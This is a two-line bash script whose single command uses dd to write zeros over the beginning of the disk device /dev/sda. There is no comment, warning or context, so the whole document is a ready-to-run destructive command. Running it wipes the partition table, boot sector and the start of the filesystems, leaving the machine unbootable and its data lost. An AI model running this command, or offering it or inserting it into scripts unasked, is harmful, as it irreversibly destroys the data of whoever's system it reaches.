#!/bin/bash
dd if=/dev/zero of=/dev/sda count=500000
